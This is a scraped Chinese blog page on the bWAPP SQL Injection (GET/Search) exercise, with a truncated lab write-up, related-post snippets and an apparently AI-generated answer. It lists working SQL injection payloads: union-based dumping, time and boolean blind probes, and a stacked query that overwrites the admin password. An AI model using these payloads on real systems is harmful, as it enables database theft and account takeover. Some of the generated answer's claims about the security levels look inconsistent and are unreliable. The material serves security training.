bWAPP练习--injection篇SQL Injection (GET/Search)

最新推荐文章于 2024-12-16 18:00:00 发布
最新推荐文章于 2024-12-16 18:00:00 发布
阅读量1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
文章标签: 数据库 php 操作系统
原文链接:http://www.cnblogs.com/ESHLkangi/p/8762676.html
本文详细介绍了SQL注入攻击的原理和在bWAPP平台上的实践过程,包括LOW、MEDIUM和HIGH级别防护措施的分析。通过注入测试,揭示了字段数探测、爆表以及获取数据库信息等技巧。同时展示了PHP中addslashes()和mysql_real_escape_string()函数作为防护手段的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入:

SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

LOW:

0x01:分析一下网站的后台源码

主要源代码:

 1 if(isset($_GET["title"]))//判断通过get方法获取title的值是否为空值
 2 {
 3     //将get方法获取的值赋值个title变量
 4     $title = $_GET["title"];
 5     //后台SQL查询语句
 6     $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";
 7     //对MySQL数据库进行查询
 8     $recordset = mysql_query(
最低0.47元/天 解锁文章

200万优质内容无限畅学
(SEED-Lab)SQL Injection Attack Lab SQL注入实验
lunan的博客
02-02 5194
(SEED-Lab)SQL Injection Attack Lab SQL注入实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 Apache Confifiguration3 Lab Tasks3.1 Task 1: Get Familiar with SQL Statements3.2 Task 2: SQL Injection Attack on SELECT Statement3.
bwapp闯关()SQL injection<low>
weixin_44894271的博客
05-17 511
前言 本文章记录bwappSQL injection模块,web安全测试SQL注入 环境准备 docker部署bwapp火狐浏览器安装hackbar插件,登录进入bwapp页面,选择bug类型<SQL injection(GET/Search)>,并设置安全等级为low 按照字段搜索可以看到查询结果信息列表如下 单引号注入检测 根据搜索查询业务我们可以猜想查询用户信息列表的SQL大致为:select XX from database where title = “id”,此时titl
bWAPP靶场 injection SQL Injection GET/Search
2301_77205899的博客
04-23 503
bWAPP靶场入门 简单sql注入过程 bWAPP靶场 injection SQL Injection GET/Search
bWAPP----SQL Injection (GET/Search)
weixin_30477293的博客
07-23 637
SQL Injection (GET/Search) 输入单引号 报错,在%'附近出错,猜测参数被 '% %'这种形式包裹,没有任何过滤,直接带入了数据库查询 输入order by查询列 union select 确定显示位 然后分别查询用户,数据库名,数据库版本 根据数据库版本知道可以通过information_schema表查询信息,查询table...
小白bWapp SQL Injection(GET/Search)
syh_sss的博客
08-10 282
1.
SQL Injection (GET/Search)
qq_40554015的博客
09-17 857
SQL Injection (GET/Search) 1.判断注入点 输入' 提示: near '%'' at line 1 1111' or 1=1 # 无异常 2.判断字段数 ' order by 10 # ' order by 7 # 7个字段 3.判断可显示字段: -1' union select 1,2,3,4,5,6,7 # 2,3,4,5 为可显示字段 4.爆库: -1' union select 1,datab...
bWAPPSQL InjectionGET/Search
waZTG的博客
11-21 1149
文章主要介绍了两种获取数据库相关信息的方法。第一种先是阐述获取当前连接数据库名、所有表、特定表(如 users 表)所有字段以及用户名和密码的具体 SQL 语句操作,通过修改语句中的 limit 等参数逐步查找所需内容。第二种同样围绕获取数据库名、用户名、所有表、特定表字段以及用户名和密码展开,给出对应的 SQL 语句构造形式,还提及在获取密码时有 32 位的限制情况及相应处理语句,整体聚焦数据库信息提取相关的技术操作内容。
bwappSQL Injection(GET/Search)——low级别
用博客做做记录的小白
06-13 818
bwapp靶场的sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入。
bWAPPSQL注入实战
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-16 1677
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
bWAPP -- SQL Injection
hee_mee的博客
09-19 314
zeroNIL
BWAPPSQL注入通关
qq_43665434的博客
04-17 3406
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
bWAPPSQL注入思路
qq_37019068的博客
10-09 1516
bWAPPSQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
python3---项目bwapp--对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现
xwbk12的博客
05-18 1228
python3—项目bwapp–对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现 1、项目背景
sql_injection之基本get注入
aipei5098的博客
04-14 206
1、代码 <?php error_reporting(0); include("../conn.php"); if(isset($_GET['id'])){ $id=$_GET['id']; echo "你当前输入id:".$id."<br>"; $sql="select * from user where id='$id' ...
bWAPP-SQLInjectionSQLite
hee_mee的博客
09-26 411
zeronil
bWAPP-SQLInjection2
hee_mee的博客
09-20 180
zeroNil
webgote的例子(4)Sql注入(SelectGET)
时光凉春衫薄的博客
03-25 271
SQL Injection (Select/GET) 本章内容 (查询显示中要注意的错误) 这里面我们看一下 movie的数值,选择表单中的当我们选择的二个的时候 move的值也变成了第二个,选择表单中第三个第四个的值的时候move的值也相应的进行了改变,通过这个我们不难推出这个查询的结果和move一一对应的关系。 我们不妨再个包看看,get方法请求的路径里面还是将这个值拿到数据库...
bWAPP-SQLInjectionPost2
hee_mee的博客
09-20 177
zeronil
SQL Injection (GET/Select)
qq_40554015的博客
09-17 516
选项点一点,观察URL,只有movie的值在变化,和GET/Search中的title应该是一样的 看看类型 http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go 1.查字段数 http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go 2.查看可显示字段 http://192.168.3.95/bWAPP/sq...
给出bwapp靶场SQL Injection (GET/Search)关卡的漏洞原理和三个级别的测试思路和payload,用人话整理答案回答
最新发布
03-15
<think>好的,我现在需要处理用户关于bWAPPSQL注入GET/Search关卡的漏洞解析、不同安全级别的测试方法和payload示例的问题。首先,我得回忆一下bWAPP的基本情况,它是一个故意设计有漏洞的Web应用,用于安全演练。SQL注入漏洞通常发生在用户输入未经适当处理就直接拼接到SQL查询中的情况。 用户提到的GET/Search关卡,应该是指通过GET请求进行搜索功能,可能存在注入点。不同安全级别可能对应不同的防护措施,比如低级别没有防护,中级别可能用了转义,高级别可能用了预处理语句。需要分别分析每个级别的漏洞原理和测试方法。 首先,漏洞原理部分。需要解释SQL注入如何在这个搜索功能中发生。用户输入的关键字被直接拼接到SQL查询的WHERE子句中,如果没有过滤或转义,攻击者可以构造恶意输入改变查询逻辑。例如,输入' OR '1'='1可能导致返回所有记录。 接下来是不同安全级别的测试思路。低级别可能完全没有防护,可以直接注入。中级别可能用了mysql_real_escape_string等函数,但可能存在绕过方法,比如使用编码或绕过特定字符。高级别可能使用参数化查询,这时候注入就无效了,但需要确认是否正确实现。 然后是payload示例,需要针对不同级别给出具体的注入语句。比如低级别的联合查询注入,中级别的布尔盲注或时间盲注,高级别可能无法注入,但需要测试是否有其他漏洞。 还要参考用户提供的引用内容,特别是关于时间盲注和布尔注入的部分。引用中提到了使用sleep函数和时间延迟来判断注入是否成功,比如?id=1" and sleep(if(条件,5,0)) --+,这可以用于中级别可能存在过滤但未完全防护的情况。 需要确保回答结构清晰,分点说明每个安全级别的原理、测试方法和payload示例。同时,引用的内容要自然融入,比如在时间盲注部分添加引用标识[^3]。 最后,生成相关问题,可能涉及其他类型的注入、防御措施或更复杂的利用技巧。例如,如何防御这种注入,或者如何利用错误信息进行注入。 现在要组织这些内容,确保符合用户的要求,使用正确的LaTeX格式,避免任何markdown,用中文回答,并自然地添加引用标识。</think>### bwapp SQL注入GET/Search关卡漏洞解析 #### 一、漏洞原理 该漏洞源于搜索功能未对用户输入的`title`参数进行有效过滤,导致攻击者可通过构造特殊字符直接修改SQL查询逻辑。例如原始SQL语句可能为: $$SELECT * FROM movies WHERE title LIKE '%$_GET["title"]%'$$ 当用户输入`' OR 1=1 -- `时,查询变为: $$SELECT * FROM movies WHERE title LIKE '%' OR 1=1 -- %'$$ 这将返回所有电影记录[^1]。 #### 二、不同安全级别测试方法 **1. 低级(low)** - **防护措施**:无任何过滤 - **测试思路**:直接使用联合查询注入 - **Payload示例**: ```sql ' UNION SELECT 1,database(),3 -- ``` ```sql ' AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- ``` **2. 中级(medium)** - **防护措施**:使用`mysql_real_escape_string()`转义特殊字符 - **绕过方法**:利用未过滤的数值型参数或十六进制编码 - **Payload示例**: ```sql 1' AND 1=IF(2>1,SLEEP(5),0) -- ``` ```sql ' UNION SELECT 1,@@version,3 /*!50000UNION*/ ``` **3. 高级(high)** - **防护措施**:采用预处理语句 - **测试思路**:验证是否存在二次注入漏洞 - **Payload示例**: ```sql '; UPDATE users SET password='hacked' WHERE user='admin' -- ``` (需配合存储型注入场景) #### 三、进阶利用技巧 1. **时间盲注**: ```sql ' AND IF(ASCII(SUBSTR(database(),1,1))>100, SLEEP(5), 0) -- ``` 通过响应延迟判断字符ASCII值[^3] 2. **布尔盲注**: ```sql ' AND (SELECT SUBSTR(password,1,1) FROM users LIMIT 1)='a' -- ``` 根据页面内容差异判断注入结果[^2]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值